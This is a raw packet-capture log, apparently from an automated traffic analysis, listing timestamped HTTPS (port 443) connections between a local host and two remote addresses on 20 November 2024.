                                                                                                                                                                                                Nov 20, 2024 10:54:21.812577963 CET4434972913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.813065052 CET49729443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.813083887 CET4434972913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.813746929 CET49729443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.813751936 CET4434972913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.823616028 CET4434972813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.823756933 CET4434972813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.823903084 CET49728443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.823925972 CET49728443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.823925972 CET49728443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.823944092 CET4434972813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.823952913 CET4434972813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.824860096 CET4434973013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.825397968 CET49730443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.825428963 CET4434973013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.825831890 CET49730443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.825838089 CET4434973013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.827435017 CET49731443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.827461958 CET4434973113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.827585936 CET49731443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.827682972 CET49731443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.827701092 CET4434973113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.872402906 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.872468948 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.872503996 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.872534037 CET49725443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:21.872539997 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.872555017 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.872582912 CET49725443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:21.873318911 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.873375893 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.873378038 CET49725443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:21.873389006 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.873431921 CET49725443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:21.873518944 CET4434972613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.873661995 CET4434972613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.873713970 CET49726443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.873791933 CET49726443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.873795986 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.873805046 CET4434972613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.873815060 CET49726443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.873819113 CET4434972613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.876744032 CET49732443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.876802921 CET4434973213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.876924992 CET49732443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.877039909 CET49732443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.877058029 CET4434973213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.881127119 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.881191015 CET49725443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:21.881208897 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.909862995 CET4434972713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.909946918 CET4434972713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.909998894 CET49727443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.910197973 CET49727443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.910217047 CET4434972713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.910228014 CET49727443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.910233974 CET4434972713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.913122892 CET49733443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.913209915 CET4434973313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.913311005 CET49733443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.913456917 CET49733443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.913491964 CET4434973313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.916845083 CET4434972913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.916903973 CET4434972913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.916945934 CET49729443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.917011976 CET49729443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.917018890 CET4434972913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.917052984 CET49729443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.917057037 CET4434972913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.919076920 CET49734443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.919107914 CET4434973413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.919229031 CET49734443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.919337034 CET49734443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.919351101 CET4434973413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.922561884 CET49725443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:21.922579050 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.925761938 CET4434973013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.925913095 CET4434973013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.925976038 CET49730443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.926199913 CET49730443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.926218033 CET4434973013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.926232100 CET49730443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.926238060 CET4434973013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.929275990 CET49735443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.929299116 CET4434973513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.929369926 CET49735443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.929635048 CET49735443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:21.929660082 CET4434973513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.960758924 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.960844994 CET49725443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:21.960864067 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.960886955 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.960937977 CET49725443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:21.963001013 CET49725443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:21.963021040 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:21.963040113 CET49725443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:21.963047981 CET44349725188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.391839027 CET49736443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:22.391887903 CET44349736188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.391962051 CET49736443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:22.404221058 CET49736443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:22.404238939 CET44349736188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.486948013 CET4434973113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.506346941 CET49731443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.506366014 CET4434973113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.506793976 CET49731443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.506799936 CET4434973113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.546736956 CET4434973213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.564455032 CET4434973313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.571932077 CET4434973413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.594504118 CET49732443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.608253002 CET4434973113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.608391047 CET4434973113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.608469963 CET49731443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.610100985 CET49733443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.625734091 CET49734443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.629477978 CET49732443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.629497051 CET4434973213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.673672915 CET49732443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.673691034 CET4434973213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.673863888 CET49733443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.673923016 CET4434973313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.674222946 CET49733443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.674237013 CET4434973313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.674473047 CET49734443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.674480915 CET4434973413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.674792051 CET49734443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.674798965 CET4434973413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.675024986 CET49731443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.675043106 CET4434973113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.675055027 CET49731443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.675061941 CET4434973113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.681206942 CET49737443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.681235075 CET4434973713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.681305885 CET49737443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.681421995 CET49737443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.681436062 CET4434973713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.770119905 CET4434973313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.770179033 CET4434973313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.770294905 CET49733443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.771893978 CET4434973413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.771964073 CET4434973413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.772033930 CET49734443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.772984982 CET4434973213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.773051977 CET4434973213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.773128986 CET49732443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.780865908 CET49733443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.780913115 CET4434973313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.780941010 CET49733443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.780956984 CET4434973313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.788399935 CET49734443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.788428068 CET4434973413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.788443089 CET49734443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.788450956 CET4434973413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.792442083 CET49732443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.792452097 CET4434973213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.792478085 CET49732443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.792483091 CET4434973213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.797224998 CET4434973513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.802035093 CET49735443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.802057028 CET4434973513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.802525043 CET49735443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.802536964 CET4434973513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.804302931 CET49738443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.804361105 CET4434973813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.804452896 CET49738443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.804543972 CET49739443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.804599047 CET4434973913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.804650068 CET49738443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.804651976 CET49739443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.804666042 CET4434973813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.804852962 CET49739443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.804868937 CET4434973913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.805377960 CET49740443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.805413008 CET4434974013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.805459023 CET49740443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.805625916 CET49740443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.805638075 CET4434974013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.871125937 CET44349736188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.871244907 CET49736443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:22.872545958 CET49736443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:22.872553110 CET44349736188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.872888088 CET44349736188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.874295950 CET49736443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:22.874454975 CET49736443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:22.874506950 CET44349736188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.898577929 CET4434973513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.898655891 CET4434973513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.898758888 CET49735443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.898941040 CET49735443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.898961067 CET4434973513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.899013042 CET49735443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.899028063 CET4434973513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.902000904 CET49741443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.902044058 CET4434974113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:22.902147055 CET49741443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.902333975 CET49741443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:22.902362108 CET4434974113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.317853928 CET4434973713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.318581104 CET49737443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.318605900 CET4434973713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.319031000 CET49737443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.319039106 CET4434973713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.421818018 CET4434973713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.421889067 CET4434973713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.421936035 CET49737443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.422137022 CET49737443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.422158003 CET4434973713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.422169924 CET49737443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.422177076 CET4434973713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.425501108 CET49742443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.425529957 CET4434974213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.425601959 CET49742443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.425746918 CET49742443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.425760031 CET4434974213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.442244053 CET4434973913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.442827940 CET49739443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.442837954 CET4434973913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.443294048 CET49739443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.443299055 CET4434973913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.446647882 CET4434974013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.446976900 CET49740443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.446990967 CET4434974013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.447357893 CET49740443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.447361946 CET4434974013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.447469950 CET4434973813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.447726965 CET49738443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.447751045 CET4434973813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.448055983 CET49738443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.448060989 CET4434973813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.544394970 CET4434973913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.544454098 CET4434973913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.544644117 CET49739443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.544786930 CET49739443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.544801950 CET4434973913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.544812918 CET49739443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.544819117 CET4434973913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.545741081 CET4434973813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.545819044 CET4434973813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.545866013 CET49738443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.546003103 CET49738443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.546020031 CET4434973813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.546031952 CET49738443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.546037912 CET4434973813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.546477079 CET4434974013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.546539068 CET4434974013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.546586037 CET49740443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.546717882 CET49740443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.546731949 CET4434974013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.546741009 CET49740443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.546746969 CET4434974013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.547187090 CET4434974113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.548019886 CET49743443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.548047066 CET4434974313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.548101902 CET49743443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.548238993 CET49743443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.548254013 CET4434974313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.548573971 CET49741443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.548587084 CET4434974113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.549022913 CET49741443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.549027920 CET4434974113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.549803019 CET49744443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.549820900 CET4434974413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.549895048 CET49744443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.550024986 CET49744443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.550025940 CET49745443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.550036907 CET4434974413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.550046921 CET4434974513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.550107956 CET49745443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.550251961 CET49745443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.550266027 CET4434974513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.629992962 CET44349736188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.630108118 CET44349736188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.630260944 CET49736443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:23.630333900 CET49736443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:23.630353928 CET44349736188.114.96.3192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.646569967 CET4434974113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.646652937 CET4434974113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.646727085 CET49741443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.654747009 CET49741443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.654762030 CET4434974113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.654772043 CET49741443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.654777050 CET4434974113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.657723904 CET49746443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.657740116 CET4434974613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.657809973 CET49746443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.657978058 CET49746443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:23.657984018 CET4434974613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:23.782881975 CET49747443192.168.2.7188.114.96.3
                                                                                                                                                                                                Nov 20, 2024 10:54:23.782902956 CET44349747188.114.96.3192.168.2.7
